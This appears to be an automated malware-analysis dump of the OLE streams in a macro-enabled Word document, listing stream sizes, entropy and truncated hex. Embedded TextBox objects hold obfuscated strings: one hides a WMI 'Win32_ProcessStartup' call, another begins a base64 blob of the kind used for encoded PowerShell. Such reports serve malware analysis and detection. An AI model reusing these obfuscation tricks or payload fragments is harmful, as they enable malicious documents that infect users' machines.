Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 89

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	89
Entropy:	3.59090450368
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . s n L F 1 V . s . n . L . F . 1 . V . . . J I o d C j f v . J . I . o . d . C . j . f . v . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 73 6e 4c 46 31 56 00 73 00 6e 00 4c 00 46 00 31 00 56 00 00 00 4a 49 6f 64 43 6a 66 76 00 4a 00 49 00 6f 00 64 00 43 00 6a 00 66 00 76 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 16910

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	16910
Entropy:	5.54553098729
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2114

General
Stream Path:	Macros/VBA/__SRP_0
File Type:	data
Stream Size:	2114
Entropy:	4.65721405944
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . p & . . . L . j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00

Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 507

General
Stream Path:	Macros/VBA/__SRP_1
File Type:	data
Stream Size:	507
Entropy:	4.07674775518
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . a . . . . . . . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X a 4 G a A . . . . . . . . m h C 4 O 0 H p . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . F i k b d Q Z . . . . i . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . N 2 S p O i I D . . . . . . . . m w X I 7 m . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 61 00 00 00 00 00 01 00 79 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 02 00 00 08 06 00 00 00 58 61 34 47 61 41 03 00 00 08 08 00 00 00 6d 68 43 34 4f 30 48 70 03 00 00 09 69 07 00 00

Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 2956

General
Stream Path:	Macros/VBA/__SRP_2
File Type:	data
Stream Size:	2956
Entropy:	2.53035163856
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 02 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 15 00 e1 03 00 00 00 00 00 00 09 08 00 00 00 00 00 00 31 08 00 00 00 00 00 00 09 00 00 00 01 00 02 00 c1 07 00 00 00 00 00 00 0a 00 0e 00 38 00 00 00 59 08 00 00 00 00 00 00 99 00 00 00 00 00

Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 846

General
Stream Path:	Macros/VBA/__SRP_3
File Type:	data
Stream Size:	846
Entropy:	3.09934303505
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . < . . . . 1 . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . D . . . . I . . . . . . . . . . . . . . . . . . @ . . 4 . . . . . . . . . . T . . . . i . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 e0 00 00 00 04 00 14 00 20 00 d9 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 00 00 04 40 02 00 04 07 1d f1 00 00 00 00 00 01 00 34 00 00 00 20 00 11 01 00 00 00 00 01 00 ff ff ff ff 01 00 00 00 01 00 04 40 02 00 10 07 1d f1 00 00 00 00 00 01 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 901

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	901
Entropy:	6.47934500425
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . R q s D M _ . . , . X a 4 G a A @ . . . . . X . a . 4 . * G . . A . 6 . . " m h . C 4 O 0 H p = . } . . . . . . < . * . . . . . A . . C . i _ . K . $ . < . . . . . e s t d o l e > . . s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ s y s t e m . 3 2 \\ . 2 2 . t l . b # O L E A u . t o m a t i o n . . 0 . . . E N o r m a . l . E
Data Raw:	01 81 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 06 00 1c 80 52 71 73 44 4d 5f 05 02 2c 00 58 61 34 47 61 41 40 00 02 0c 00 2e 58 00 61 00 34 00 2a 47 00 0a 41 00 36 08 00 22 6d 68 00 43 34 4f 30 48 70 3d 00 7d 09 1a 07 02 ae 00 3c 00 2a 01 ea 01 12 09 41 02 13 43 d2 69 5f 20 02 4b 00 24 00 3c 01 16 00 16 02 65 73 74 20 64 6f 6c 65

Stream Path: ObjectPool/_1630480601/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480601/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480601/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480601/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.9166422781
Base64 Encoded:	False
Data ASCII:	F . i . k . b . d . Q . Z . . . . . . .
Data Raw:	46 00 69 00 6b 00 62 00 64 00 51 00 5a 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480601/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480601/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480601/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480601/contents
File Type:	data
Stream Size:	64
Entropy:	3.55239648336
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . z n l 2 l 8 i 3 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 3
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 7a 6e 6c 32 6c 38 69 33 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 33

Stream Path: ObjectPool/_1630480602/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480602/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480602/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480602/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	2.17095059445
Base64 Encoded:	False
Data ASCII:	N . 2 . S . p . O . i . I . D . . . . .
Data Raw:	4e 00 32 00 53 00 70 00 4f 00 69 00 49 00 44 00 00 00 00 00

Stream Path: ObjectPool/_1630480602/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480602/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480602/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480602/contents
File Type:	data
Stream Size:	64
Entropy:	3.5759867178
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . B 0 0 2 l n 7 3 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 3
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 42 30 30 32 6c 6e 37 33 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 33

Stream Path: ObjectPool/_1630480603/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480603/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480603/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480603/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.55677964945
Base64 Encoded:	False
Data ASCII:	m . w . X . I . 7 . m . . . . . . . . .
Data Raw:	6d 00 77 00 58 00 49 00 37 00 6d 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480603/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480603/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480603/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480603/contents
File Type:	data
Stream Size:	64
Entropy:	3.59544160058
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . I V i 9 m s n 3 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 3
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 49 56 69 39 6d 73 6e 33 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 33

Stream Path: ObjectPool/_1630480604/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480604/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480604/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480604/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	2.17095059445
Base64 Encoded:	False
Data ASCII:	P . 8 . 3 . A . c . X . T . u . . . . .
Data Raw:	50 00 38 00 33 00 41 00 63 00 58 00 54 00 75 00 00 00 00 00

Stream Path: ObjectPool/_1630480604/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480604/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480604/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480604/contents
File Type:	data
Stream Size:	64
Entropy:	3.6072367178
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . F I C 9 7 a z 3 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 3
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 08 00 00 80 1a 00 00 00 1a 00 00 00 46 49 43 39 37 61 7a 33 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 33

Stream Path: ObjectPool/_1630480605/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480605/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480605/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480605/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.9166422781
Base64 Encoded:	False
Data ASCII:	Q . F . a . 7 . T . z . v . . . . . . .
Data Raw:	51 00 46 00 61 00 37 00 54 00 7a 00 76 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480605/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480605/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480605/contents, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480605/contents
File Type:	data
Stream Size:	116
Entropy:	4.39351761296
Base64 Encoded:	False
Data ASCII:	. . T . . . @ . . . . . . H . , 9 . . . . . . . . . . . w i n m I u H 3 g m t s I u H 3 : W i n I u H 3 3 2 _ P I u H 3 r o c e I u H 3 s s S t I u H 3 a r t u I u H 3 p . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
Data Raw:	00 02 54 00 01 01 40 80 00 00 00 00 1b 48 80 2c 39 00 00 80 1a 00 00 00 1a 00 00 00 77 69 6e 6d 49 75 48 33 67 6d 74 73 49 75 48 33 3a 57 69 6e 49 75 48 33 33 32 5f 50 49 75 48 33 72 6f 63 65 49 75 48 33 73 73 53 74 49 75 48 33 61 72 74 75 49 75 48 33 70 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f

Stream Path: ObjectPool/_1630480606/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480606/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480606/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480606/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	2.17095059445
Base64 Encoded:	False
Data ASCII:	T . C . R . M . 9 . s . q . j . . . . .
Data Raw:	54 00 43 00 52 00 4d 00 39 00 73 00 71 00 6a 00 00 00 00 00

Stream Path: ObjectPool/_1630480606/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480606/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480606/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480606/contents
File Type:	data
Stream Size:	64
Entropy:	3.5759867178
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . S i s U 0 T i o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 53 69 73 55 30 54 69 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f

Stream Path: ObjectPool/_1630480607/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480607/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480607/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480607/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.65677964945
Base64 Encoded:	False
Data ASCII:	V . E . Y . j . p . 2 . . . . . . . . .
Data Raw:	56 00 45 00 59 00 6a 00 70 00 32 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480607/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480607/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480607/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480607/contents
File Type:	data
Stream Size:	64
Entropy:	3.53294160058
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . T j i z 2 o i o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 54 6a 69 7a 32 6f 69 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f

Stream Path: ObjectPool/_1630480608/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480608/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480608/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480608/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	2.17095059445
Base64 Encoded:	False
Data ASCII:	V . H . f . L . _ . K . 2 . S . . . . .
Data Raw:	56 00 48 00 66 00 4c 00 5f 00 4b 00 32 00 53 00 00 00 00 00

Stream Path: ObjectPool/_1630480608/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480608/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480608/contents, File Type: data, Stream Size: 4420

General
Stream Path:	ObjectPool/_1630480608/contents
File Type:	data
Stream Size:	4420
Entropy:	3.95961733751
Base64 Encoded:	False
Data ASCII:	. . $ . . . @ . . . . . . H . , . . . . . . . . . . . . J A B I u H 3 t A E I u H 3 g A S I u H 3 w B 3 I u H 3 A F I I u H 3 A R g I u H 3 A 9 A I u H 3 C c A I u H 3 S g B I u H 3 J A G I u H 3 I A b I u H 3 g B 2 I u H 3 A G Y I u H 3 A b w I u H 3 B M A I u H 3 C c A I u H 3 O w A I u H 3 k A G I u H 3 I A M I u H 3 w B h I u H 3 A F M I u H 3 A a Q I u H 3 B t A I u H 3 D Q A I u H 3 X w A I u H 3 g A D I u H 3 0 A I I u H 3 A A n I u H 3 A D k I u H 3 A O A I u H 3 A y A I u H 3 C c A I u H 3 O w A I
Data Raw:	00 02 24 11 01 01 40 80 00 00 00 00 1b 48 80 2c 0c 11 00 80 1a 00 00 00 1a 00 00 00 4a 41 42 49 75 48 33 74 41 45 49 75 48 33 67 41 53 49 75 48 33 77 42 33 49 75 48 33 41 46 49 49 75 48 33 41 52 67 49 75 48 33 41 39 41 49 75 48 33 43 63 41 49 75 48 33 53 67 42 49 75 48 33 4a 41 47 49 75 48 33 49 41 62 49 75 48 33 67 42 32 49 75 48 33 41 47 59 49 75 48 33 41 62 77 49 75 48 33 42 4d

Stream Path: ObjectPool/_1630480609/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480609/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

